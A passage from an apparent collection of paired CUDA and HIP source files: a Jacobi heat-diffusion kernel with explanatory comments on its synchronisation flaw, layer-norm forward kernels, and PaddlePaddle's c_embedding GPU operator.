blockDim.x * blockIdx.x; i = myId / n; j = myId - n * i; index_center = i*n + j; south = j - 1 > 0 ? (j - 1) + i*n : 0; west = i - 1 > 0 ? j + (i - 1)*n : -1; north = j + 1 < n - 1 ? (j + 1) + i*n : -1; east = i + 1 < n - 1 ? j + (i + 1)*n : -1; //in[0] = 0; //if (j < 1) {S = 0;} else {S = in[(int)south];} //if (j > n - 2) {N = 0;} else {N = in[(int)north];} //if (i > n - 2) {E = 0;} else {E = in[(int)east];} //if (i < 1) {W = 0;} else {W = in[(int)west];} // if (i < n - 1 && j < n - 1 && i>0 && j>0) // { out[index_center] = 0.25 * (in[(int)north] + in[(int)south] + in[(int)east] + in[(int)west]); /* out[index_center] = 0.25 * (S+ N + E + W); */ // } //__syncthreads(); if (i == 0) { out[index_center] = 0; } if (i == n - 1) { out[index_center] = 0; } if (j == n - 1) { out[index_center] = 0; } // __syncthreads(); if (j == 0) { out[index_center - j] = 1; } __syncthreads(); in[index_center] = out[index_center]; } void Print_matrix(int N, FILE *f, double *m, long int n) { for (int i = 0; i < n; i++) { for (int j = 0; j < n; j++) { fprintf(f, "%f\t", m[i*N + j]); } } fprintf(f, "\n"); }
9520a711c0456826bb8879f6babfd71c24685511.cu
#include <stdio.h> #include <stdint.h> #include <string.h> #include <math.h> void Print_matrix(int N, FILE *f, double *m, long int n); __global__ void Jacobi(long int n, double *in, double *out); int main(void) { int N = 128; int block = 1024; int grid = N * N / 1024; double *heat = (double *) calloc(sizeof(double), N * N), *arr, *arr_out; cudaMalloc(&arr, sizeof(double) * N * N); cudaMalloc(&arr_out, sizeof(double) * N * N); cudaMemcpy(arr, heat, sizeof(double) * N * N, cudaMemcpyHostToDevice); dim3 Block(block); dim3 Grid(grid); int k_iter = 0; for (int i = 0; i < N; i++) { heat[N * i] = 1; } FILE *f = fopen("heat.txt", "wb"); for(;;) { k_iter++; Jacobi<<<Grid, Block>>>(N, arr, arr_out); cudaMemcpy(heat, arr, sizeof(double)*N*N, cudaMemcpyDeviceToHost); Print_matrix(N, f, heat, N); if (k_iter >= 200) { break; } } cudaDeviceSynchronize(); fclose(f); free(heat); cudaFree(arr); cudaFree(arr_out); } __global__ void Jacobi(long int n, double *in, double *out) { int myId, i, j; int north, south, east, west; //double N, S, E, W; int index_center; //int flag = 0; myId = threadIdx.x + blockDim.x * blockIdx.x; i = myId / n; j = myId - n * i; index_center = i*n + j; south = j - 1 > 0 ? (j - 1) + i*n : 0; west = i - 1 > 0 ? j + (i - 1)*n : -1; north = j + 1 < n - 1 ? (j + 1) + i*n : -1; east = i + 1 < n - 1 ? j + (i + 1)*n : -1; //in[0] = 0; //if (j < 1) {S = 0;} else {S = in[(int)south];} //if (j > n - 2) {N = 0;} else {N = in[(int)north];} //if (i > n - 2) {E = 0;} else {E = in[(int)east];} //if (i < 1) {W = 0;} else {W = in[(int)west];} // if (i < n - 1 && j < n - 1 && i>0 && j>0) // { out[index_center] = 0.25 * (in[(int)north] + in[(int)south] + in[(int)east] + in[(int)west]); /* out[index_center] = 0.25 * (S+ N + E + W); */ // } //__syncthreads(); if (i == 0) { out[index_center] = 0; } if (i == n - 1) { out[index_center] = 0; } if (j == n - 1) { out[index_center] = 0; } // __syncthreads(); if (j == 0) { out[index_center - j] = 1; } __syncthreads(); in[index_center] = out[index_center]; } void Print_matrix(int N, FILE *f, double *m, long int n) { for (int i = 0; i < n; i++) { for (int j = 0; j < n; j++) { fprintf(f, "%f\t", m[i*N + j]); } } fprintf(f, "\n"); }
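The Jacobi kernel above copies out[] back into in[] at the end of every launch and relies on __syncthreads(), which only synchronizes a single block, to order that grid-wide update. The more common arrangement, sketched below with the same host variables, drops that final copy from the kernel and ping-pongs the two device buffers between launches; launches issued to the same stream execute in order, so each sweep sees the previous sweep's completed update.

// Hypothetical driver loop; assumes the kernel no longer writes back into in[].
for (int k_iter = 0; k_iter < 200; k_iter++) {
    Jacobi<<<Grid, Block>>>(N, arr, arr_out);
    double *tmp = arr; arr = arr_out; arr_out = tmp;   // swap roles for the next sweep
}
cudaMemcpy(heat, arr, sizeof(double) * N * N, cudaMemcpyDeviceToHost);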
2628f677a3046447d6ff56e72dee8f18b7ec371b.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "utils.cuh" #include "ln_kernel_traits.h" #include "ATen/hip/HIPContext.h" template <typename Ktraits> __global__ __launch_bounds__(Ktraits::THREADS_PER_CTA) void ln_fwd_kernel( void *__restrict__ y_, void *__restrict__ mu_, void *__restrict__ rsigma_, const void *__restrict__ x_, const void *__restrict__ gamma_, const void *__restrict__ beta_, const float epsilon, int rows) { using Vec = typename Ktraits::Vec; using base_t = typename Ktraits::base_t; using compute_t = typename Ktraits::compute_t; enum { NUM_ELTS = Vec::NUM_ELTS }; enum { WARPS_N = Ktraits::WARPS_N }; enum { WARPS_M = Ktraits::WARPS_M }; enum { ROWS_PER_CTA = Ktraits::ROWS_PER_CTA }; enum { THREADS_PER_ROW = Ktraits::THREADS_PER_ROW }; enum { BYTES_PER_LDG = Ktraits::BYTES_PER_LDG }; static_assert(BYTES_PER_LDG == 16, ""); enum { BYTES_PER_ROW = Ktraits::BYTES_PER_ROW }; enum { LDGS = BYTES_PER_ROW / Ktraits::BYTES_PER_ROW_PER_CTA }; static_assert(LDGS * Ktraits::BYTES_PER_ROW_PER_CTA == BYTES_PER_ROW, ""); const int tidx = threadIdx.x; const int bidx = blockIdx.x; const int lane = tidx % THREADS_PER_WARP; const int warp = tidx / THREADS_PER_WARP; const int warp_n = warp % WARPS_N; const int warp_m = warp / WARPS_N; const int c = warp_n * THREADS_PER_WARP + lane; const int r = bidx * ROWS_PER_CTA + warp_m; const char *x_ptr = static_cast<const char *>(x_); const char *g_ptr = static_cast<const char *>(gamma_); const char *b_ptr = static_cast<const char *>(beta_); char *y_ptr = static_cast<char *>(y_); compute_t *mu_ptr = static_cast<compute_t *>(mu_); compute_t *rs_ptr = static_cast<compute_t *>(rsigma_); Vec gamma[LDGS]; Vec beta[LDGS]; #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { gamma[it].load_from(g_ptr + col * BYTES_PER_LDG); beta[it].load_from(b_ptr + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } constexpr compute_t rn = 1.f / compute_t(Ktraits::COLS); for (int row = r; row < rows; row += gridDim.x * ROWS_PER_CTA) { Vec x[LDGS]; #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { x[it].load_from(x_ptr + row * BYTES_PER_ROW + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } compute_t xf[LDGS * NUM_ELTS]; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { xf[it * NUM_ELTS + jt] = compute_t(x[it].data.elt[jt]); } } compute_t mu_local = 0.f; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { mu_local += xf[it * NUM_ELTS + jt]; } } #pragma unroll for (int it = 1; it < THREADS_PER_WARP; it *= 2) { mu_local += __shfl_xor_sync(uint32_t(-1), mu_local, it); } mu_local *= rn; if(lane == 0){ mu_ptr[row] = mu_local; } compute_t var_local = 0.f; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { compute_t diff = xf[it * NUM_ELTS + jt] - mu_local; var_local += diff * diff; } } #pragma unroll for (int it = 1; it < THREADS_PER_WARP; it *= 2) { var_local += __shfl_xor_sync(uint32_t(-1), var_local, it); } compute_t rsigma = rsqrtf(var_local * rn + epsilon); if(lane == 0){ rs_ptr[row] = rsigma; } #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { base_t tmp = (rsigma * (xf[it * NUM_ELTS + jt] - mu_local)); x[it].data.elt[jt] = gamma[it].data.elt[jt] * tmp + beta[it].data.elt[jt]; } } #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { x[it].store_to(y_ptr + row * BYTES_PER_ROW + col * 
BYTES_PER_LDG); col += THREADS_PER_ROW; } } } template<typename scalar_t> void launch( at::Tensor & y, // BxSxhidden_size at::Tensor & mu, at::Tensor & rsigma, const at::Tensor & x, // BxSxhidden_size const at::Tensor & gamma, const at::Tensor & beta, const float epsilon, const int rows, const int cols, const int max_gridx, hipStream_t stream ){ if (cols == 2048){ using Ktraits = Kernel_traits<scalar_t, 2048, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 2560){ using Ktraits = Kernel_traits<scalar_t, 2560, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 3072){ using Ktraits = Kernel_traits<scalar_t, 3072, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 3584){ using Ktraits = Kernel_traits<scalar_t, 3584, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 4096){ using Ktraits = Kernel_traits<scalar_t, 4096, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 1024) { using Ktraits = Kernel_traits<scalar_t, 1024, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 512){ using Ktraits = Kernel_traits<scalar_t, 512, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 256){ using Ktraits = Kernel_traits<scalar_t, 256, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 8192){ using Ktraits = Kernel_traits<scalar_t, 8192, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), 
dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else { assert(false && "Not implemented"); } AT_CUDA_CHECK(hipPeekAtLastError()); } void ln_fwd_cuda( at::Tensor & y, // BxSxhidden_size at::Tensor & mu, at::Tensor & rsigma, const at::Tensor & x, // BxSxhidden_size const at::Tensor & gamma, const at::Tensor & beta, const float epsilon, const int rows, const int cols, hipStream_t stream ){ const auto dtype = x.scalar_type(); const auto props = at::cuda::getCurrentDeviceProperties(); const int max_gridx = props->maxGridSize[0]; //TODO // - Using dispatch macro costs 1% perf wtf?!?! // - Tune FP32 warps // - Add more sizes if (dtype == torch::kFloat16) { launch<half>(y, mu, rsigma, x, gamma, beta, epsilon, rows, cols, max_gridx, stream); } else if (dtype == torch::kFloat32) { launch<float>(y, mu, rsigma, x, gamma, beta, epsilon, rows, cols, max_gridx, stream); } else { assert(false && "Not implemented"); } }
2628f677a3046447d6ff56e72dee8f18b7ec371b.cu
#include "utils.cuh" #include "ln_kernel_traits.h" #include "ATen/cuda/CUDAContext.h" template <typename Ktraits> __global__ __launch_bounds__(Ktraits::THREADS_PER_CTA) void ln_fwd_kernel( void *__restrict__ y_, void *__restrict__ mu_, void *__restrict__ rsigma_, const void *__restrict__ x_, const void *__restrict__ gamma_, const void *__restrict__ beta_, const float epsilon, int rows) { using Vec = typename Ktraits::Vec; using base_t = typename Ktraits::base_t; using compute_t = typename Ktraits::compute_t; enum { NUM_ELTS = Vec::NUM_ELTS }; enum { WARPS_N = Ktraits::WARPS_N }; enum { WARPS_M = Ktraits::WARPS_M }; enum { ROWS_PER_CTA = Ktraits::ROWS_PER_CTA }; enum { THREADS_PER_ROW = Ktraits::THREADS_PER_ROW }; enum { BYTES_PER_LDG = Ktraits::BYTES_PER_LDG }; static_assert(BYTES_PER_LDG == 16, ""); enum { BYTES_PER_ROW = Ktraits::BYTES_PER_ROW }; enum { LDGS = BYTES_PER_ROW / Ktraits::BYTES_PER_ROW_PER_CTA }; static_assert(LDGS * Ktraits::BYTES_PER_ROW_PER_CTA == BYTES_PER_ROW, ""); const int tidx = threadIdx.x; const int bidx = blockIdx.x; const int lane = tidx % THREADS_PER_WARP; const int warp = tidx / THREADS_PER_WARP; const int warp_n = warp % WARPS_N; const int warp_m = warp / WARPS_N; const int c = warp_n * THREADS_PER_WARP + lane; const int r = bidx * ROWS_PER_CTA + warp_m; const char *x_ptr = static_cast<const char *>(x_); const char *g_ptr = static_cast<const char *>(gamma_); const char *b_ptr = static_cast<const char *>(beta_); char *y_ptr = static_cast<char *>(y_); compute_t *mu_ptr = static_cast<compute_t *>(mu_); compute_t *rs_ptr = static_cast<compute_t *>(rsigma_); Vec gamma[LDGS]; Vec beta[LDGS]; #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { gamma[it].load_from(g_ptr + col * BYTES_PER_LDG); beta[it].load_from(b_ptr + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } constexpr compute_t rn = 1.f / compute_t(Ktraits::COLS); for (int row = r; row < rows; row += gridDim.x * ROWS_PER_CTA) { Vec x[LDGS]; #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { x[it].load_from(x_ptr + row * BYTES_PER_ROW + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } compute_t xf[LDGS * NUM_ELTS]; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { xf[it * NUM_ELTS + jt] = compute_t(x[it].data.elt[jt]); } } compute_t mu_local = 0.f; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { mu_local += xf[it * NUM_ELTS + jt]; } } #pragma unroll for (int it = 1; it < THREADS_PER_WARP; it *= 2) { mu_local += __shfl_xor_sync(uint32_t(-1), mu_local, it); } mu_local *= rn; if(lane == 0){ mu_ptr[row] = mu_local; } compute_t var_local = 0.f; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { compute_t diff = xf[it * NUM_ELTS + jt] - mu_local; var_local += diff * diff; } } #pragma unroll for (int it = 1; it < THREADS_PER_WARP; it *= 2) { var_local += __shfl_xor_sync(uint32_t(-1), var_local, it); } compute_t rsigma = rsqrtf(var_local * rn + epsilon); if(lane == 0){ rs_ptr[row] = rsigma; } #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { base_t tmp = (rsigma * (xf[it * NUM_ELTS + jt] - mu_local)); x[it].data.elt[jt] = gamma[it].data.elt[jt] * tmp + beta[it].data.elt[jt]; } } #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { x[it].store_to(y_ptr + row * BYTES_PER_ROW + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } } } template<typename scalar_t> void launch( 
at::Tensor & y, // BxSxhidden_size at::Tensor & mu, at::Tensor & rsigma, const at::Tensor & x, // BxSxhidden_size const at::Tensor & gamma, const at::Tensor & beta, const float epsilon, const int rows, const int cols, const int max_gridx, cudaStream_t stream ){ if (cols == 2048){ using Ktraits = Kernel_traits<scalar_t, 2048, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 2560){ using Ktraits = Kernel_traits<scalar_t, 2560, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 3072){ using Ktraits = Kernel_traits<scalar_t, 3072, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 3584){ using Ktraits = Kernel_traits<scalar_t, 3584, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 4096){ using Ktraits = Kernel_traits<scalar_t, 4096, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 1024) { using Ktraits = Kernel_traits<scalar_t, 1024, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 512){ using Ktraits = Kernel_traits<scalar_t, 512, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 256){ using Ktraits = Kernel_traits<scalar_t, 256, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 8192){ using Ktraits = Kernel_traits<scalar_t, 8192, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else { assert(false && "Not implemented"); } AT_CUDA_CHECK(cudaPeekAtLastError()); } void ln_fwd_cuda( at::Tensor & y, // BxSxhidden_size at::Tensor & mu, at::Tensor & rsigma, const at::Tensor & x, // BxSxhidden_size const 
at::Tensor & gamma, const at::Tensor & beta, const float epsilon, const int rows, const int cols, cudaStream_t stream ){ const auto dtype = x.scalar_type(); const auto props = at::cuda::getCurrentDeviceProperties(); const int max_gridx = props->maxGridSize[0]; //TODO // - Using dispatch macro costs 1% perf wtf?!?! // - Tune FP32 warps // - Add more sizes if (dtype == torch::kFloat16) { launch<half>(y, mu, rsigma, x, gamma, beta, epsilon, rows, cols, max_gridx, stream); } else if (dtype == torch::kFloat32) { launch<float>(y, mu, rsigma, x, gamma, beta, epsilon, rows, cols, max_gridx, stream); } else { assert(false && "Not implemented"); } }
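The device-side workhorse in ln_fwd_kernel is the butterfly all-reduce over one warp with __shfl_xor_sync, used twice: once for the mean and once for the variance. Isolated, and assuming 32-lane warps as the kernel's THREADS_PER_WARP loops do, it is just:

// After the loop every lane holds the sum of all 32 lanes' inputs.
__device__ inline float warp_allreduce_sum(float v)
{
    #pragma unroll
    for (int offset = 1; offset < 32; offset *= 2)
        v += __shfl_xor_sync(0xffffffffu, v, offset);   // exchange with lane ^ offset
    return v;
}

With that reduction in hand, the statistics are mu = rn * sum(x) and rsigma = rsqrtf(rn * sum((x - mu)^2) + epsilon), and the output is gamma * rsigma * (x - mu) + beta, exactly as the kernel computes inline.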
efec454fba703ef2971be0167ec081f49e46d00e.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #include "paddle/fluid/framework/eigen.h" #include "paddle/fluid/framework/op_registry.h" #include "paddle/fluid/operators/collective/c_embedding_op.h" #include "paddle/fluid/platform/cuda_primitives.h" #include "paddle/fluid/platform/float16.h" namespace paddle { namespace operators { static constexpr int kNumCUDAThreads = 512; static constexpr int kNumMaxinumNumBlocks = 4096; static inline int NumBlocks(const int N) { return ::min((N + kNumCUDAThreads - 1) / kNumCUDAThreads, kNumMaxinumNumBlocks); } template <typename T, typename IndexT> __global__ void CEmbedding(T *out, const T *table, const IndexT *ids, const int rows, const int columns, const int64_t N, const int64_t start_idx, const int64_t end_idx, const int64_t limit) { CUDA_KERNEL_LOOP(i, limit) { size_t row = i / columns; size_t col = i % columns; auto id = ids[row]; if (id >= start_idx && id < end_idx) { auto real_idx = id - start_idx; PADDLE_ENFORCE(real_idx < N, "The index is out of bounds, " "please check whether the dimensions of index and " "input meet the requirements. It should " "be less than [%d], but received [%d]", N, real_idx); out[i] = table[real_idx * columns + col]; } else { out[i] = static_cast<T>(0); } } } template <typename T, typename IndexT> __global__ void CEmbeddingGrad(T *table, const T *output, const IndexT *ids, const int rows, const int columns, const int64_t N, const int64_t start_idx, const int64_t end_idx, const int64_t limit) { CUDA_KERNEL_LOOP(i, limit) { size_t row = i / columns; size_t col = i % columns; auto id = ids[row]; if (id >= start_idx && id < end_idx) { auto real_idx = id - start_idx; paddle::platform::CudaAtomicAdd(&table[real_idx * columns + col], output[i]); } } } template <typename T> class CEmbeddingCUDAKernel : public framework::OpKernel<T> { public: void Compute(const framework::ExecutionContext &context) const override { auto *table_t = context.Input<LoDTensor>("W"); auto *ids_t = context.Input<LoDTensor>("Ids"); auto *output_t = context.Output<LoDTensor>("Out"); const auto &dev_ctx = context.template device_context<platform::CUDADeviceContext>(); const int64_t start_idx = context.Attr<int64_t>("start_index"); size_t N = table_t->dims()[0]; size_t D = table_t->dims()[1]; size_t K = ids_t->numel(); const int64_t end_idx = start_idx + N; auto *table = table_t->data<T>(); auto *output = output_t->mutable_data<T>(context.GetPlace()); auto limit = K * D; int blocks = NumBlocks(limit); int threads = kNumCUDAThreads; const auto &index_type = ids_t->type(); if (index_type == framework::proto::VarType::INT32) { hipLaunchKernelGGL(( CEmbedding<T, int32_t>), dim3(blocks), dim3(threads), 0, dev_ctx.stream(), output, table, ids_t->data<int32_t>(), K, D, N, start_idx, end_idx, limit); } else if (index_type == framework::proto::VarType::INT64) { hipLaunchKernelGGL(( CEmbedding<T, int64_t>), dim3(blocks), dim3(threads), 0, 
dev_ctx.stream(), output, table, ids_t->data<int64_t>(), K, D, N, start_idx, end_idx, limit); } else { PADDLE_THROW(platform::errors::Unavailable( "GPU c_embedding ids only support int32 or int64.")); } } }; template <typename T> class CEmbeddingGradCUDAKernel : public framework::OpKernel<T> { public: void Compute(const framework::ExecutionContext &context) const override { const auto &dev_ctx = context.template device_context<platform::CUDADeviceContext>(); const int64_t start_idx = context.Attr<int64_t>("start_index"); auto ids_t = context.Input<LoDTensor>("Ids"); auto d_output_t = context.Input<LoDTensor>(framework::GradVarName("Out")); auto d_table_t = context.Output<LoDTensor>(framework::GradVarName("W")); int N = d_table_t->dims()[0]; int D = d_table_t->dims()[1]; int K = ids_t->numel(); const int64_t end_idx = start_idx + N; auto limit = K * D; int blocks = NumBlocks(limit); int threads = kNumCUDAThreads; const T *d_output = d_output_t->data<T>(); T *d_table = d_table_t->mutable_data<T>(context.GetPlace()); auto t = framework::EigenVector<T>::Flatten(*d_table_t); t.device(*dev_ctx.eigen_device()) = t.constant(static_cast<T>(0)); const auto &index_type = ids_t->type(); if (index_type == framework::proto::VarType::INT32) { hipLaunchKernelGGL(( CEmbeddingGrad<T, int32_t>), dim3(blocks), dim3(threads), 0, dev_ctx.stream(), d_table, d_output, ids_t->data<int32_t>(), K, D, N, start_idx, end_idx, limit); } else if (index_type == framework::proto::VarType::INT64) { hipLaunchKernelGGL(( CEmbeddingGrad<T, int64_t>), dim3(blocks), dim3(threads), 0, dev_ctx.stream(), d_table, d_output, ids_t->data<int64_t>(), K, D, N, start_idx, end_idx, limit); } } }; } // namespace operators } // namespace paddle namespace ops = paddle::operators; namespace plat = paddle::platform; REGISTER_OP_CUDA_KERNEL(c_embedding, ops::CEmbeddingCUDAKernel<float>, ops::CEmbeddingCUDAKernel<double>, ops::CEmbeddingCUDAKernel<plat::float16>); REGISTER_OP_CUDA_KERNEL(c_embedding_grad, ops::CEmbeddingGradCUDAKernel<float>, ops::CEmbeddingGradCUDAKernel<double>, ops::CEmbeddingGradCUDAKernel<plat::float16>);
efec454fba703ef2971be0167ec081f49e46d00e.cu
/* Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #include "paddle/fluid/framework/eigen.h" #include "paddle/fluid/framework/op_registry.h" #include "paddle/fluid/operators/collective/c_embedding_op.h" #include "paddle/fluid/platform/cuda_primitives.h" #include "paddle/fluid/platform/float16.h" namespace paddle { namespace operators { static constexpr int kNumCUDAThreads = 512; static constexpr int kNumMaxinumNumBlocks = 4096; static inline int NumBlocks(const int N) { return std::min((N + kNumCUDAThreads - 1) / kNumCUDAThreads, kNumMaxinumNumBlocks); } template <typename T, typename IndexT> __global__ void CEmbedding(T *out, const T *table, const IndexT *ids, const int rows, const int columns, const int64_t N, const int64_t start_idx, const int64_t end_idx, const int64_t limit) { CUDA_KERNEL_LOOP(i, limit) { size_t row = i / columns; size_t col = i % columns; auto id = ids[row]; if (id >= start_idx && id < end_idx) { auto real_idx = id - start_idx; PADDLE_ENFORCE(real_idx < N, "The index is out of bounds, " "please check whether the dimensions of index and " "input meet the requirements. It should " "be less than [%d], but received [%d]", N, real_idx); out[i] = table[real_idx * columns + col]; } else { out[i] = static_cast<T>(0); } } } template <typename T, typename IndexT> __global__ void CEmbeddingGrad(T *table, const T *output, const IndexT *ids, const int rows, const int columns, const int64_t N, const int64_t start_idx, const int64_t end_idx, const int64_t limit) { CUDA_KERNEL_LOOP(i, limit) { size_t row = i / columns; size_t col = i % columns; auto id = ids[row]; if (id >= start_idx && id < end_idx) { auto real_idx = id - start_idx; paddle::platform::CudaAtomicAdd(&table[real_idx * columns + col], output[i]); } } } template <typename T> class CEmbeddingCUDAKernel : public framework::OpKernel<T> { public: void 